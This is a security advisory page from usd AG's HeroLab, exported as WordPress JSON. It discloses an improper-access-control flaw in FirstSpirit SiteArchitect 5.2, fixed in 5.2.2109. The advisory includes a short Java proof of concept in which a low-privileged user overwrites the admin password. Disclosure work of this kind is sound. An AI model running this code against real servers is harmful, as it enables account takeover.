{"id":16546,"date":"2021-07-07T12:52:42","date_gmt":"2021-07-07T10:52:42","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0012\/"},"modified":"2021-07-19T14:07:39","modified_gmt":"2021-07-19T12:07:39","slug":"usd-2018-0012","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0012\/","title":{"rendered":"usd-2018-0012"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0012 | FirstSpirit SiteArchitect\/5.2<\/span><\/h1>\n<p><span><\/span><br \/><strong>Advisory ID<\/strong><span>: usd-2018-0012<\/span><br \/><strong>CVE Number<\/strong><span>: N\/A<\/span><br \/><strong>Affected Product<\/strong><span>: FirstSpirit SiteArchitect<\/span><br \/><strong>Affected Version<\/strong><span>: 5.2<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Improper Access Control<\/span><br \/><strong>Security Risk<\/strong><span>: High<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.e-spirit.com\/de\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.e-spirit.com\/de\/<\/a><br \/><strong>Vendor Status<\/strong><span>: Fixed according to vendor in version 5.2.2109<\/span><\/p>\n<h3>Description<\/h3>\n<p>Administrative functions are not properly protected by access control. This allows attackers to access administrative functions such as changing passwords or adding new users.<\/p>\n<p>Access control involves the use of several protection mechanisms such as authentication, authorization and accountability. 
When any mechanism is not applied or otherwise fails, attackers can compromise the security of the software by gaining privileges, reading sensitive information, executing commands, evading detection, etc.<\/p>\n<h3>Proof of Concept<\/h3>\n<p><span>Generic example case:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<pre><code>public static void main(String[] args) throws Exception {\n    ConnectionManager.setProxy((Proxy) null);\n    ConnectionManager.setCompression((byte) 0);\n    ConnectionManager.setEncryption((byte) 2);\n    ConnectionManager.setUseHttps(false);\n\n    \/\/ Connect and authenticate with the supplied user credentials\n    ServerConnection c = (ServerConnection) ConnectionManager.getConnection(\"\", 8000, 1, \"user\", \"password\");\n    c.connect();\n\n    \/\/ Fetch the admin account via UserManager and overwrite its password\n    UserManager userManager = c.getManager(UserManager.class);\n    UserDTO admin = userManager.getAdminUser();\n    admin.setPassword(\"test\");\n    userManager.updateUserData(admin);\n}<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<div class=\"e11146-18 x-container max width\">\n<div class=\"e11146-19 x-column x-sm x-1-1\">\n<div class=\"x-text\">\n<p>Access to sensitive functions should be avoided. 
Necessary access should be explicitly protected by authentication and global access control.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<h3>Timeline<\/h3>\n<ul>\n<li>2018-04-04 First contact request via info@e-spirit.com<\/li>\n<li>2018-04-24 Send vulnerabilities to vendor<\/li>\n<li>2018-05-15 Vendor releases a patch to fix the vulnerabilities<\/li>\n<li>2018-07-06 Security advisory released<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><span>These security vulnerabilities were found by Sebastian Puttkammer of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0012 | FirstSpirit SiteArchitect\/5.2 Advisory ID: usd-2018-0012CVE Number: N\/AAffected Product: FirstSpirit SiteArchitectAffected Version: 5.2Vulnerability Type: Improper Access ControlSecurity Risk: HighVendor URL: https:\/\/www.e-spirit.com\/de\/Vendor Status: Fixed according to vendor in version 5.2.2109 Description Administrative functions are not properly protected by access control. This allows attackers to access administrative functions such as changing passwords or adding new users. 
[&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16546","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16546"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16546\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}